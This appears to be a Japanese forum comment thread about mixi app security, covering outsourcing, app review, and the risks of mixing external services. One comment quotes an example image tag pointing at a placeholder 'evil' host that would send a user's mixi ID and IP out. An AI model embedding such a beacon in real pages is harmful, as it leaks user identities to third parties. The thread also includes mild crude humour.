アカウント名:
パスワード:
mixiやってねーから、よくわからんのだけど、
・特定のアプリを開発している会社の問題・インフラに金がかかりすぎたmixiアプリの問題・mixiアプリの審査体制の問題
全部いっぺんに書いてる?
一番の問題は、安全に「外のもの」を中に入れたり「中のもの」を外に出すことの難しさをmixi側が認識していなかったことでしょう。
これまでは、mixiがクラックされない限り、mixi内にさえいれば、安全であったのですが、外の世界を取り込んだり、外の世界に中のデータを渡してしまえば、その前提が成り立たなくなるのです。
えらくいい加減な仮定ですが、全てのサービスが、クラックされない可能性がともに等しくa(1)とすると、mixiだけであれば、クラックされる確率は1-aなのですが、n-1個の外部サービスを加えると、クラックされる確率は1-a^nに増えてしまうのです。
# mixiアプリが始まった当初、自分のmixi日記に、アプリが<img src="http://www.example.com/evil.cgi?id=${USER_ID}">と出力したらIPとmixiIDを紐付けされる、と書いてた。# もうされてるのかなぁ?
ごめん、全く関係のない話だけれど、
安全に「外のもの」を中に入れたり「中のもの」を外に出すことの難しさを
中とか外とか言う前に、ちゃんとゴムしましょうよ、とか瞬間的に思った自分はBANされるべきだと思いました。orz
#普通の発言がエロく見える程度には欲求不満ぽいのでAC
>中とか外とか言う前に、ちゃんとゴムしましょうよ、つまりOAuthを使って密着しているけれど明示的に分離しましょう、ということですね分かります。
だな。更に言うなら
・アプリをアウトソーシングしてもウマーとなるとは限らない
ってのはでかいかと。ここしばらくなんでもかんでもアウトソーシングでOKみたいな流れがあるのできちんと適材適所でやるようになれば良いやね。
より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。
日々是ハック也 -- あるハードコアバイナリアン
全部別の話? (スコア:2, すばらしい洞察)
mixiやってねーから、よくわからんのだけど、
・特定のアプリを開発している会社の問題
・インフラに金がかかりすぎたmixiアプリの問題
・mixiアプリの審査体制の問題
全部いっぺんに書いてる?
Re:全部別の話? (スコア:1)
一番の問題は、安全に「外のもの」を中に入れたり「中のもの」を外に出すことの難しさをmixi側が認識していなかったことでしょう。
これまでは、mixiがクラックされない限り、mixi内にさえいれば、安全であったのですが、
外の世界を取り込んだり、外の世界に中のデータを渡してしまえば、その前提が成り立たなくなるのです。
えらくいい加減な仮定ですが、全てのサービスが、クラックされない可能性がともに等しくa(1)とすると、
mixiだけであれば、クラックされる確率は1-aなのですが、n-1個の外部サービスを加えると、クラックされる確率は1-a^nに増えてしまうのです。
# mixiアプリが始まった当初、自分のmixi日記に、アプリが<img src="http://www.example.com/evil.cgi?id=${USER_ID}">と出力したらIPとmixiIDを紐付けされる、と書いてた。
# もうされてるのかなぁ?
1を聞いて0を知れ!
Re:全部別の話? (おふとぴちゃちゃおげふぃん: -9999) (スコア:0)
ごめん、全く関係のない話だけれど、
中とか外とか言う前に、ちゃんとゴムしましょうよ、とか瞬間的に思った自分はBANされるべきだと思いました。orz
#普通の発言がエロく見える程度には欲求不満ぽいのでAC
Re:全部別の話? (おふとぴちゃちゃおげふぃん: -9999) (スコア:1, 参考になる)
>中とか外とか言う前に、ちゃんとゴムしましょうよ、
つまりOAuthを使って密着しているけれど明示的に分離しましょう、ということですね分かります。
Re: (スコア:0)
だな。更に言うなら
・アプリをアウトソーシングしてもウマーとなるとは限らない
ってのはでかいかと。
ここしばらくなんでもかんでもアウトソーシングでOKみたいな流れがあるので
きちんと適材適所でやるようになれば良いやね。
Re: (スコア:0)
mixiもtwitterもやってないし、自分のwebページも持っていない俺様はやっぱり幸せだな